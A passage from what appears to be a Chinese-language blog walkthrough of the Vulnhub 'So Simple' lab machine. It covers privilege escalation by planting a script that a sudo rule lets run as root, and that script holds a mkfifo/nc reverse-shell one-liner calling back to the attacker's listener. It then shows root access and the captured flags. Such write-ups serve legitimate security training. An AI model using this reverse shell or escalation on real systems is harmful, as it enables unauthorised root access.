-rw-r--r-- 1 steven steven 220 Jul 12 2020 .bash_logout
-rw-r--r-- 1 steven steven 3.7K Jul 12 2020 .bashrc
drwxrwxr-x 3 steven steven 4.0K Jul 13 2020 .local
-rw-r--r-- 1 steven steven 807 Jul 12 2020 .profile
-rwxr-x--- 1 steven steven 33 Jul 13 2020 user2.txt
steven@so-simple:/home/steven$ cat user2.txt
b662b31b7d8cb9f5cdc9c2010337f9b8
steven@so-simple:/home/steven$
这样就拿到了第二个flag
提权
steven@so-simple:/$ cd /opt
steven@so-simple:/opt$ ls
steven@so-simple:/opt$ mkdir tools
steven@so-simple:/opt$ touch server-health.sh
steven@so-simple:/opt$ cd tools
steven@so-simple:/opt/tools$ vi server-health.sh
steven@so-simple:/opt/tools$ cat server-health.sh
#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 6666 >/tmp/f
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo -u root ./server-health.sh
到/opt目录后,发现没有tools目录以及server-health.sh文件,创建它们,然后执行,从而拿到root shell
steven@so-simple:/$ cd /opt
steven@so-simple:/opt$ ls
steven@so-simple:/opt$ mkdir tools
steven@so-simple:/opt$ touch server-health.sh
steven@so-simple:/opt$ cd tools
steven@so-simple:/opt/tools$ vi server-health.sh
steven@so-simple:/opt/tools$ cat server-health.sh
#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 6666 >/tmp/f
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo -u root ./server-health.sh
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.171] 54008
root@so-simple:/opt/tools#
root@so-simple:/opt/tools#
root@so-simple:/opt/tools#
root@so-simple:/opt/tools#
root@so-simple:/opt/tools#
root@so-simple:/opt/tools# id
id
uid=0(root) gid=0(root) groups=0(root)
root@so-simple:/opt/tools# cd /root
cd /root
root@so-simple:~# ls -alh
ls -alh
total 40K
drwx------ 5 root root 4.0K Jul 15 2020 .
drwxr-xr-x 20 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 root root 3.1K Jul 15 2020 .bashrc
drwx------ 2 root root 4.0K Jul 12 2020 .cache
-rw------- 1 root root 28 Jul 15 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Jul 12 2020 .local
-rw------- 1 root root 282 Jul 14 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 3.7K Jul 12 2020 flag.txt
drwxr-xr-x 4 root root 4.0K Jul 12 2020 snap
root@so-simple:~# cat flag.txt
cat flag.txt
/$$$$$$ /$$ /$$
/$$__ $$ | $$ | $$
| $$ \__/ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$$| $$
| $$ /$$__ $$| $$__ $$ /$$__ $$ /$$__ $$|____ $$|_ $$_/ |____ /$$/| $$
| $$ | $$ \ $$| $$ \ $$| $$ \ $$| $$ \__/ /$$$$$$$ | $$ /$$$$/ |__/
| $$ $$| $$ | $$| $$ | $$| $$ | $$| $$ /$$__ $$ | $$ /$$ /$$__/
| $$$$$$/| $$$$$$/| $$ | $$| $$$$$$$| $$ | $$$$$$$ | $$$$//$$$$$$$$ /$$
\______/ \______/ |__/ |__/ \____ $$|__/ \_______/ \___/ |________/|__/
/$$ \ $$
| $$$$$$/
\______/
/$$ /$$ /$$ /$$
| $$ /$$/ | $/ | $$
\ $$ /$$//$$$$$$ /$$ /$$|_//$$ /$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$
\ $$$$//$$__ $$| $$ | $$ | $$ /$$//$$__ $$ /$$__ $$| $$ | $$ | $$| $$__ $$ /$$__ $$ /$$__ $$
\ $$/| $$ \ $$| $$ | $$ \ $$/$$/| $$$$$$$$ | $$ \ $$| $$ | $$ | $$| $$ \ $$| $$$$$$$$| $$ | $$
| $$ | $$ | $$| $$ | $$ \ $$$/ | $$_____/ | $$ | $$| $$ | $$ | $$| $$ | $$| $$_____/| $$ | $$
| $$ | $$$$$$/| $$$$$$/ \ $/ | $$$$$$$ | $$$$$$$/| $$$$$/$$$$/| $$ | $$| $$$$$$$| $$$$$$$
|__/ \______/ \______/ \_/ \_______/ | $$____/ \_____/\___/ |__/ |__/ \_______/ \_______/
| $$
/$$ /$$$$$$ /$$$$$$ /$$ | $$ /$$ /$$
| $//$$__ $$ /$$__ $$|__/ |__/ | $$ | $/
|_/| $$ \__/ /$$$$$$ | $$ \__/ /$$ /$$$$$$/$$$$ /$$$$$$ | $$ /$$$$$$|_/
| $$$$$$ /$$__ $$ | $$$$$$ | $$| $$_ $$_ $$ /$$__ $$| $$ /$$__ $$
\____ $$| $$ \ $$ \____ $$| $$| $$ \ $$ \ $$| $$ \ $$| $$| $$$$$$$$
/$$ \ $$| $$ | $$ /$$ \ $$| $$| $$ | $$ | $$| $$ | $$| $$| $$_____/
| $$$$$$/| $$$$$$/ | $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$| $$$$$$$
\______/ \______/ \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/
| $$
| $$
|__/
Easy box right? Hope you've had fun! Show me the flag on Twitter @roelvb79
root@so-simple:~#
v
成功拿到了root flag!!!
哈哈,感觉这个靶机名不副实,不简单!
标签:56.171,http,Simple,192.168,simple,So,Vulnhub,steven,wordpress From: https://www.cnblogs.com/jason-huawen/p/16884208.html